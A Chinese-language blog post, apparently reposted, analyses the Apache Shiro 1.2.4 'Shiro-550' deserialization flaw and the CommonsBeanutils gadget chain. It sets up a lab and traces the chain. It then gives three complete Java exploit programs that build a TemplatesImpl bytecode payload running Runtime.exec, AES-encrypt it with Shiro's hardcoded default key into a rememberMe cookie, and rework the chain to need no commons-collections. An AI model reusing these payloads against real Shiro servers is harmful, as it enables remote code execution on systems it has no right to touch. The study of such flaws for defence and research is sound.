Shiro反序列化分析

前言

Shiro，一个流行的web框架，养活了一大批web狗，现在来对它分析分析。Shiro的gadget是CB链，其实是CC4改过来的，因为Shiro框架是自带Commoncollections的，除此之外还带了一个包叫做CommonBeanUtils，主要利用类就在这个包里
环境搭建

https://codeload.github.com/apache/shiro/zip/shiro-root-1.2.4
编辑shiro/samples/web目录下的pom.xml,将jstl的版本修改为1.2

1. <dependency>
2.     <groupId>javax.servlet</groupId>
3.     <artifactId>jstl</artifactId>
4.     <version>1.2</version>
5.     <scope>runtime</scope>
6. </dependency>

复制代码

之后tomat搭起来就行了，选择sample-web.war

CB链分析

先回顾一下CC4

1. * Gadget chain:
2. *      ObjectInputStream.readObject()
3. *          PriorityQueue.readObject()
4. *              PriorityQueue.heapify()
5. *                  PriorityQueue.siftDown()
6. *                 PriorityQueue.siftDownUsingComparator()
7. *                     TransformingComparator.compare()
8. *                         InvokerTransformer.transform()
9. *                             Method.invoke()
10. *                                 TemplatesImpl.newTransformer()
11. *                                     TemplatesImpl.getTransletInstance()
12. *                                         Runtime.exec()

复制代码

CB链跟CC4的不同点就是从compare开始的，恰恰可以从CommonBeanUtils包里找到BeanComparator这个类

主要看PropertyUtils.getProperty这个方法可以任意类的get方法调用，可以调用任意bean(class)的一个get方法去获取nameproperty属性

写个demo测试一下

1. package org.example;
3. import org.apache.commons.beanutils.PropertyUtils;
5. import java.lang.reflect.InvocationTargetException;
7. public class User {
8.     private String name;
9.     private int age;
10.     public User(String name, int age){
11.         this.name = name;
12.         this.age = age;
13.     }
15.     public String getName() {
16.         System.out.println("Hello, getname");
17.         return name;
18.     }
19.     public int getAge() {
20.         System.out.println("Hello, getage");
21.         return age;
22.     }
23.     public void setName(String name) {
24.         this.name = name;
25.     }
26.     public void setAge(int age) {
27.         this.age = age;
28.     }
30.     public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException {
31.         PropertyUtils.getProperty(new User("F12", 18), "name");
32.         PropertyUtils.getProperty(new User("F12", 18), "age");
33.     }
34. }
36. // 输出
37. Hello, getname
38. Hello, getage

复制代码

这样就可以利用TemplatesImpl中的getOutputProperties方法，这里面可以触发任意类的实例化，从而执行命令，注意这个类须继承AbstractTranslet类，或则改掉父类的默认值，假如忘了请回顾CC3
依靠：

1. <dependencies>
2.         <dependency>
3.             <groupId>commons-beanutils</groupId>
4.             <artifactId>commons-beanutils</artifactId>
5.             <version>1.8.3</version>
6.         </dependency>
7.         <dependency>
8.             <groupId>org.apache.shiro</groupId>
9.             <artifactId>shiro-core</artifactId>
10.             <version>1.2.4</version>
11.         </dependency>
13.         <dependency>
14.             <groupId>org.javassist</groupId>
15.             <artifactId>javassist</artifactId>
16.             <version>3.27.0-GA</version>
17.         </dependency>
19.         <dependency>
20.             <groupId>commons-collections</groupId>
21.             <artifactId>commons-collections</artifactId>
22.             <version>3.2.1</version>
23.         </dependency>
24.         <dependency>
25.             <groupId>commons-logging</groupId>
26.             <artifactId>commons-logging</artifactId>
27.             <version>1.1.1</version>
28.         </dependency>
29. </dependencies>

复制代码

1. package org.example;
4. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
5. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
6. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
7. import javassist.*;
8. import org.apache.commons.beanutils.BeanComparator;
10. import java.io.*;
11. import java.lang.reflect.Field;
12. import java.util.PriorityQueue;
14. public class Test {
15.     public static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
16.         Field field = obj.getClass().getDeclaredField(fieldName);
17.         field.setAccessible(true);
18.         field.set(obj, value);
19.     }
20.     public static void serialize(Object obj) throws IOException {
21.         FileOutputStream fis = new FileOutputStream("cb.bin");
22.         ObjectOutputStream ois = new ObjectOutputStream(fis);
23.         ois.writeObject(obj);
24.     }
25.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
26.         FileInputStream fis = new FileInputStream(filename);
27.         ObjectInputStream ois = new ObjectInputStream(fis);
28.         ois.readObject();
29.     }
30.     public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
31.         ClassPool pool = ClassPool.getDefault();
32.         pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
33.         CtClass ct = pool.makeClass("Cat");
34.         String cmd = "java.lang.Runtime.getRuntime().exec("calc");";
35.         ct.makeClassInitializer().insertBefore(cmd);
36.         String randomClassName = "Evil" + System.nanoTime();
37.         ct.setName(randomClassName);
38.         ct.setSuperclass(pool.get(AbstractTranslet.class.getName()));
39.         TemplatesImpl obj = new TemplatesImpl();
40.         setFieldValue(obj, "_bytecodes", new byte[][]{ct.toBytecode()});
41.         setFieldValue(obj, "_name", "F12");
42.         setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
43.         final BeanComparator beanComparator = new BeanComparator();
44.         final PriorityQueue priorityQueue = new PriorityQueue(2, beanComparator);
45.         priorityQueue.add(1);
46.         priorityQueue.add(2);
47.         setFieldValue(beanComparator, "property", "outputProperties");
48.         setFieldValue(priorityQueue, "queue", new Object[]{obj, obj});
49.         serialize(priorityQueue);
50.         deserialize("cb.bin");
51.     }
52. }

复制代码

追踪一下链的过程，在PriorityQueue的readObject打个断点，开追，进入heapify

进入siftDown

进入siftDownUsingComparator

进入compare，到达关键点，获取TemplatesImpl的outputProperites属性

调用TemplatesImpl.getOutputProperites

进入newTransformer

进入getTransletInstance，到达世界最高城defineTransletClasses

背面就不看了，就是defineClass，至此CB链结束，还挺简单的
Shiro550分析

环境上面已经搭建好了，这里不说了
Shiro550用的其实就是CB链，这里只是有一些细节须要注意，Shiro的触发点是Cookie处解码时会进行反序列化，他天生的反序列化字符串是进行AES对称加密的，因此要在对数据进行一次AES加密，反序列化漏洞的利用就建立在知晓key的情况下，而shiro最初时，key是直接硬编码写在源码里的，全局搜serialize

可以看到这个DEFAULT_CIPHER_KEY_BYTES，amazing

1. package org.example;
4. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
5. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
6. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
7. import javassist.*;
8. import org.apache.commons.beanutils.BeanComparator;
9. import org.apache.shiro.crypto.AesCipherService;
10. import org.apache.shiro.util.ByteSource;
12. import java.io.*;
13. import java.lang.reflect.Field;
14. import java.nio.file.Files;
15. import java.nio.file.Paths;
16. import java.util.Base64;
17. import java.util.PriorityQueue;
19. public class Test {
20.     public static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
21.         Field field = obj.getClass().getDeclaredField(fieldName);
22.         field.setAccessible(true);
23.         field.set(obj, value);
24.     }
25.     public static void serialize(Object obj) throws IOException {
26.         FileOutputStream fis = new FileOutputStream("cb.bin");
27.         ObjectOutputStream ois = new ObjectOutputStream(fis);
28.         ois.writeObject(obj);
29.     }
30.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
31.         FileInputStream fis = new FileInputStream(filename);
32.         ObjectInputStream ois = new ObjectInputStream(fis);
33.         ois.readObject();
34.     }
35.     public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
36.         ClassPool pool = ClassPool.getDefault();
37.         pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
38.         CtClass ct = pool.makeClass("Cat");
39.         String cmd = "java.lang.Runtime.getRuntime().exec("calc");";
40.         ct.makeClassInitializer().insertBefore(cmd);
41.         String randomClassName = "Evil" + System.nanoTime();
42.         ct.setName(randomClassName);
43.         ct.setSuperclass(pool.get(AbstractTranslet.class.getName()));
44.         TemplatesImpl obj = new TemplatesImpl();
45.         setFieldValue(obj, "_bytecodes", new byte[][]{ct.toBytecode()});
46.         setFieldValue(obj, "_name", "F12");
47.         setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
48.         final BeanComparator beanComparator = new BeanComparator();
49.         final PriorityQueue priorityQueue = new PriorityQueue(2, beanComparator);
50.         priorityQueue.add(1);
51.         priorityQueue.add(2);
52.         setFieldValue(beanComparator, "property", "outputProperties");
53.         setFieldValue(priorityQueue, "queue", new Object[]{obj, obj});
54.         serialize(priorityQueue);
55.         byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\Property\\cb.bin"));
56.         AesCipherService aes = new AesCipherService();
57.         byte[] key = Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
58.         ByteSource encrypt = aes.encrypt(bytes, key);
59.         System.out.println(encrypt.toString());
60.     }
61. }

复制代码

但是直接报错了，报的是cc中的ComparableComparator的那个错，固然shiro中内置了CommonCollection的一部门，但是并不是所有，而org.apache.commons.collections.comparators.ComparableComparator这个类就在CC包里面,且在shiro中没有，所以寄

无依靠Shiro550 Attack

关键点在于compare方法，假如不指定comparator的话，会默认为cc中的ComparableComparator

因此我们须要指定一个Comparator

• 实现java.util.Comparator接口
  
• 实现java.io.Serializable接口
  
• Java、shiro或commons-beanutils自带，且兼容性强
  

可以找到AttrCompare

1. package org.example;
4. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
5. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
6. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
7. import com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare;
8. import javassist.*;
9. import org.apache.commons.beanutils.BeanComparator;
10. import org.apache.commons.collections.map.CaseInsensitiveMap;
11. import org.apache.shiro.crypto.AesCipherService;
12. import org.apache.shiro.util.ByteSource;
13. import sun.misc.ASCIICaseInsensitiveComparator;
15. import java.io.*;
16. import java.lang.reflect.Field;
17. import java.nio.file.Files;
18. import java.nio.file.Paths;
19. import java.util.Base64;
20. import java.util.Comparator;
21. import java.util.PriorityQueue;
23. public class Test {
24.     public static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
25.         Field field = obj.getClass().getDeclaredField(fieldName);
26.         field.setAccessible(true);
27.         field.set(obj, value);
28.     }
29.     public static void serialize(Object obj) throws IOException {
30.         FileOutputStream fis = new FileOutputStream("cb.bin");
31.         ObjectOutputStream ois = new ObjectOutputStream(fis);
32.         ois.writeObject(obj);
33.     }
34.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
35.         FileInputStream fis = new FileInputStream(filename);
36.         ObjectInputStream ois = new ObjectInputStream(fis);
37.         ois.readObject();
38.     }
39.     public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
40.         ClassPool pool = ClassPool.getDefault();
41.         pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
42.         CtClass ct = pool.makeClass("Cat");
43.         String cmd = "java.lang.Runtime.getRuntime().exec("calc");";
44.         ct.makeClassInitializer().insertBefore(cmd);
45.         String randomClassName = "Evil" + System.nanoTime();
46.         ct.setName(randomClassName);
47.         ct.setSuperclass(pool.get(AbstractTranslet.class.getName()));
48.         TemplatesImpl obj = new TemplatesImpl();
49.         setFieldValue(obj, "_bytecodes", new byte[][]{ct.toBytecode()});
50.         setFieldValue(obj, "_name", "F12");
51.         setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
52.         final BeanComparator beanComparator = new BeanComparator();
53.         final PriorityQueue priorityQueue = new PriorityQueue(2, beanComparator);
54.         priorityQueue.add(1);
55.         priorityQueue.add(2);
56.         setFieldValue(beanComparator, "property", "outputProperties");
57.         setFieldValue(beanComparator, "comparator", new AttrCompare());
58.         setFieldValue(priorityQueue, "queue", new Object[]{obj, obj});
59.         serialize(priorityQueue);
60.         byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\Property\\cb.bin"));
61.         AesCipherService aes = new AesCipherService();
62.         byte[] key = Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
63.         ByteSource encrypt = aes.encrypt(bytes, key);
64.         System.out.println(encrypt.toString());
65.     }
66. }

复制代码

成功Attack

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。